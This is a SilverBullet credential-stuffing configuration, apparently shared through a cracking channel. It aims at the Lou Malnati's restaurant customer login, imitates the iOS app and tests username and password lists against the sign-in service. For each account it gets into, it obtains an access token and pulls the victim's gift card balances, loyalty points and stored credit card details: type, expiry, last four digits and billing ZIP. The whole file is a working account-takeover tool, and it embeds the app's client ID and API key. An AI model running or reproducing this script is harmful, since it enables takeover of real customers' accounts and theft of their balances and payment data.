[SETTINGS]
{
  "Name": "Loumalnatis.com Giftcard @ALone_Devilz1",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2024-08-03T04:33:19.562271-07:00",
  "AdditionalInfo": "@SilverBullet_Configs1",
  "RequiredPlugins": [],
  "Author": "@ALone_DeviLz1",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "loumalnatis",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#ID FUNCTION RandomString "?m?m?m?m?m?m?m?m-?m?m?m?m-?m?m?m?m-?m?m?m?m-?m?m?m?m?m?m?m?m?m?m?m?m" -> VAR "ID" 

#STATE FUNCTION Base64Encode "<ID>" -> VAR "STATE" 

#CLIRQ FUNCTION RandomString "?m?m?m?m?m?m?m?m-?m?m?m?m-?m?m?m?m-?m?m?m?m-?m?m?m?m?m?m?m?m?m?m?m?m" -> VAR "CLIRQ" 

REQUEST GET "https://loumalnatisb2c.b2clogin.com/loumalnatisb2c.onmicrosoft.com/b2c_1a_signup_signin/oauth2/v2.0/authorize?x-client-Ver=1.2.5&state=<STATE>&client_info=1&prompt=select_account&response_type=code&x-app-name=Lou%20Malnati%27s&code_challenge_method=S256&x-app-ver=6.7.0&scope=https%3A%2F%2Floumalnatisb2c.onmicrosoft.com%2Fapi%2FCustomer.Read%20https%3A%2F%2Floumalnatisb2c.onmicrosoft.com%2Fapi%2FCustomer.Write%20openid%20profile%20offline_access&x-client-SKU=MSAL.iOS&x-client-OS=15.8.2&code_challenge=xGONvvpCJKOFKqfcG0khXLRe6RybbX2WhzFPbFfm754&x-client-CPU=64&redirect_uri=msauth.com.thanx.loumalnatis%3A%2F%2Fauth&client-request-id=<CLIRQ>&client_id=069cb6e8-9a67-4bcb-94d3-a9de7f3308bb&x-client-DM=iPhone&return-client-request-id=true&haschrome=1" 
  
  HEADER "Host: loumalnatisb2c.b2clogin.com" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "x-ms-PkeyAuth: 1.0" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_8_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) PKeyAuth/1.0" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Connection: keep-alive" 

#csrf PARSE "<SOURCE>" LR "\"csrf\":\"" "\"" -> VAR "csrf" 

#StateProperties PARSE "<SOURCE>" LR "\"StateProperties=" "\"" -> VAR "StateProperties" 

#pageViewId PARSE "<SOURCE>" LR "\"pageViewId\":\"" "\"" -> VAR "pageViewId" 

#U FUNCTION URLEncode "<USER>" -> VAR "U" 

REQUEST POST "https://loumalnatisb2c.b2clogin.com/loumalnatisb2c.onmicrosoft.com/B2C_1A_signup_signin/SelfAsserted?tx=StateProperties=<StateProperties>&p=B2C_1A_signup_signin" 
  CONTENT "request_type=RESPONSE&signInName=<U>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: loumalnatisb2c.b2clogin.com" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Origin: https://loumalnatisb2c.b2clogin.com" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_8_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) PKeyAuth/1.0" 
  HEADER "Referer: https://loumalnatisb2c.b2clogin.com/loumalnatisb2c.onmicrosoft.com/b2c_1a_signup_signin/oauth2/v2.0/authorize?x-client-Ver=1.2.5&state=<STATE>&client_info=1&prompt=select_account&response_type=code&x-app-name=Lou%20Malnati%27s&code_challenge_method=S256&x-app-ver=6.7.0&scope=https%3A%2F%2Floumalnatisb2c.onmicrosoft.com%2Fapi%2FCustomer.Read%20https%3A%2F%2Floumalnatisb2c.onmicrosoft.com%2Fapi%2FCustomer.Write%20openid%20profile%20offline_access&x-client-SKU=MSAL.iOS&x-client-OS=15.8.2&code_challenge=xGONvvpCJKOFKqfcG0khXLRe6RybbX2WhzFPbFfm754&x-client-CPU=64&redirect_uri=msauth.com.thanx.loumalnatis%3A%2F%2Fauth&client-request-id=<CLIRQ>&client_id=069cb6e8-9a67-4bcb-94d3-a9de7f3308bb&x-client-DM=iPhone&return-client-request-id=true&haschrome=1" 
  HEADER "Content-Length: 64" 
  HEADER "Connection: keep-alive" 
  HEADER "X-CSRF-TOKEN: <csrf>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "We can't seem to find your account." 
    KEY "Invalid username or password." 
  KEYCHAIN Success OR 
    KEY "\"status\":\"200\"" 

REQUEST GET "https://loumalnatisb2c.b2clogin.com/loumalnatisb2c.onmicrosoft.com/B2C_1A_signup_signin/api/CombinedSigninAndSignup/confirmed?rememberMe=false&csrf_token=<csrf>&tx=StateProperties=<StateProperties>&p=B2C_1A_signup_signin&diags=%7B%22pageViewId%22%3A%22<pageViewId>%22%2C%22pageId%22%3A%22CombinedSigninAndSignup%22%2C%22trace%22%3A%5B%7B%22ac%22%3A%22T005%22%2C%22acST%22%3A1717909391%2C%22acD%22%3A7%7D%2C%7B%22ac%22%3A%22T021%20-%20URL%3Ahttps%3A%2F%2Flmecomm.blob.core.windows.net%2Ftemplates%2Fb2c-login-template.html%22%2C%22acST%22%3A1717909391%2C%22acD%22%3A26%7D%2C%7B%22ac%22%3A%22T019%22%2C%22acST%22%3A1717909391%2C%22acD%22%3A55%7D%2C%7B%22ac%22%3A%22T004%22%2C%22acST%22%3A1717909391%2C%22acD%22%3A4%7D%2C%7B%22ac%22%3A%22T003%22%2C%22acST%22%3A1717909391%2C%22acD%22%3A2%7D%2C%7B%22ac%22%3A%22T035%22%2C%22acST%22%3A1717909396%2C%22acD%22%3A0%7D%2C%7B%22ac%22%3A%22T030Online%22%2C%22acST%22%3A1717909396%2C%22acD%22%3A0%7D%2C%7B%22ac%22%3A%22T002%22%2C%22acST%22%3A1717909410%2C%22acD%22%3A0%7D%2C%7B%22ac%22%3A%22T018T010%22%2C%22acST%22%3A1717909404%2C%22acD%22%3A5757%7D%5D%7D" AutoRedirect=FALSE 
  
  HEADER "Host: loumalnatisb2c.b2clogin.com" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_8_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) PKeyAuth/1.0" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Referer: https://loumalnatisb2c.b2clogin.com/loumalnatisb2c.onmicrosoft.com/b2c_1a_signup_signin/oauth2/v2.0/authorize?x-client-Ver=1.2.5&state=<STATE>&client_info=1&prompt=select_account&response_type=code&x-app-name=Lou%20Malnati%27s&code_challenge_method=S256&x-app-ver=6.7.0&scope=https%3A%2F%2Floumalnatisb2c.onmicrosoft.com%2Fapi%2FCustomer.Read%20https%3A%2F%2Floumalnatisb2c.onmicrosoft.com%2Fapi%2FCustomer.Write%20openid%20profile%20offline_access&x-client-SKU=MSAL.iOS&x-client-OS=15.8.2&code_challenge=xGONvvpCJKOFKqfcG0khXLRe6RybbX2WhzFPbFfm754&x-client-CPU=64&redirect_uri=msauth.com.thanx.loumalnatis%3A%2F%2Fauth&client-request-id=<CLIRQ>&client_id=069cb6e8-9a67-4bcb-94d3-a9de7f3308bb&x-client-DM=iPhone&return-client-request-id=true&haschrome=1" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#cli PARSE "<SOURCE>" LR "%26client_info%3d" "%" -> VAR "cli" 

#cli2 FUNCTION Base64Decode "<cli>" -> VAR "cli2" 

#o1 PARSE "<cli2>" LR "\"uid\":\"" "\"" -> VAR "o1" 

#o2 PARSE "<cli2>" LR "\"utid\":\"" "\"" -> VAR "o2" 

#code PARSE "<SOURCE>" LR "%26code%3d" "\"" -> VAR "code" 

REQUEST POST "https://loumalnatisb2c.b2clogin.com/loumalnatisb2c.onmicrosoft.com/b2c_1a_signup_signin/oauth2/v2.0/token" 
  CONTENT "client_info=1&scope=https%3A%2F%2Floumalnatisb2c.onmicrosoft.com%2Fapi%2FCustomer.Read+https%3A%2F%2Floumalnatisb2c.onmicrosoft.com%2Fapi%2FCustomer.Write+openid+profile+offline_access&code=<code>&grant_type=authorization_code&code_verifier=wb_XRZKyFrei_LcPdW8cvpQji3QVgKKJ8Ch4rinZk70&redirect_uri=msauth.com.thanx.loumalnatis%3A%2F%2Fauth&client_id=069cb6e8-9a67-4bcb-94d3-a9de7f3308bb" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: loumalnatisb2c.b2clogin.com" 
  HEADER "x-ms-PkeyAuth: 1.0" 
  HEADER "x-client-current-telemetry: 4|167,0|" 
  HEADER "client-request-id: <CLIRQ>" 
  HEADER "User-Agent: lousrnRelease/2900 CFNetwork/1335.0.3.4 Darwin/21.6.0" 
  HEADER "x-app-name: Lou Malnati's" 
  HEADER "x-client-SKU: MSAL.iOS" 
  HEADER "x-app-ver: 6.7.0" 
  HEADER "x-client-OS: 15.8.2" 
  HEADER "X-AnchorMailbox: Oid:<o1>-b2c_1a_signup_signin@<o2>" 
  HEADER "Content-Length: 1691" 
  HEADER "x-client-DM: iPhone" 
  HEADER "return-client-request-id: true" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "x-client-Ver: 1.2.5" 
  HEADER "x-client-last-telemetry: 4|0|||" 
  HEADER "Accept: application/json" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "x-client-CPU: 64" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#token PARSE "<SOURCE>" LR "\"access_token\":\"" "\"" -> VAR "token" 

#DEV FUNCTION RandomString "?m?m?m?m?m?m?m?m-?m?m?m?m-?m?m?m?m-?m?m?m?m-?m?m?m?m?m?m?m?m?m?m?m?m" -> VAR "DEV" 

#DEV2 FUNCTION GenerateGUID -> VAR "DEV2" 

REQUEST GET "https://ecomm-gateway.loumalnatis.com/api/customer/payments" 
  
  HEADER "Host: ecomm-gateway.loumalnatis.com" 
  HEADER "Authorization: Bearer <token>" 
  HEADER "x-device-name: iPhone" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "x-api-key: 56349688-f2fa-42af-9cbd-5afc463056ae" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: LousApp-PROD/6.7.0 (native; build 2900; ios 15.8.2)" 
  HEADER "x-device-id: <DEV>" 
  HEADER "x-app-version: 6.7.0" 
  HEADER "Connection: keep-alive" 
  HEADER "x-device-model: iPhone8,1" 
  HEADER "x-device-lous-id: <DEV2>" 

#GiftCards PARSE "<SOURCE>" LR "\"giftCards\":" "," CreateEmpty=FALSE -> CAP "GiftCards" 

#BonusGiftCards PARSE "<SOURCE>" LR "\"bonusGiftCards\":" "," CreateEmpty=FALSE -> CAP "BonusGiftCards" 

IF "<SOURCE>" Contains "storedPaymentId"

#CC PARSE "<SOURCE>" LR "\"creditCards\":" "}" -> VAR "CC" 

#L4 PARSE "<CC>" LR "lastFour\":\"" "\"" Recursive=TRUE -> VAR "L4" 

#EXP PARSE "<CC>" LR "expiration\":\"" "\"" Recursive=TRUE -> VAR "EXP" 

#TP PARSE "<CC>" LR "cardType\":\"" "\"" Recursive=TRUE -> VAR "TP" 

#BZ PARSE "<CC>" LR "billingZip\":\"" "\"" Recursive=TRUE -> VAR "BZ" 

#Cards FUNCTION Constant "<TP> <EXP> <L4> <BZ>" -> CAP "Cards" 

ENDIF

REQUEST GET "https://ecomm-gateway.loumalnatis.com/api/customer/loyalty" 
  
  HEADER "Host: ecomm-gateway.loumalnatis.com" 
  HEADER "Authorization: Bearer <token>" 
  HEADER "x-device-name: iPhone" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "x-api-key: 56349688-f2fa-42af-9cbd-5afc463056ae" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: LousApp-PROD/6.7.0 (native; build 2900; ios 15.8.2)" 
  HEADER "x-device-id: <DEV>" 
  HEADER "x-app-version: 6.7.0" 
  HEADER "Connection: keep-alive" 
  HEADER "x-device-model: iPhone8,1" 
  HEADER "x-device-lous-id: <DEV2>" 

#SpendablePoints PARSE "<SOURCE>" LR "\"spendablePoints\":" "," CreateEmpty=FALSE -> CAP "SpendablePoints" 

#TotalPoints PARSE "<SOURCE>" LR "\"totalPoints\":" "," CreateEmpty=FALSE -> CAP "TotalPoints" 

FUNCTION Constant "@ALone_DeviLz1" -> CAP "By " 

FUNCTION Constant "@SilverBullet_Configs1" -> CAP "Join : " 

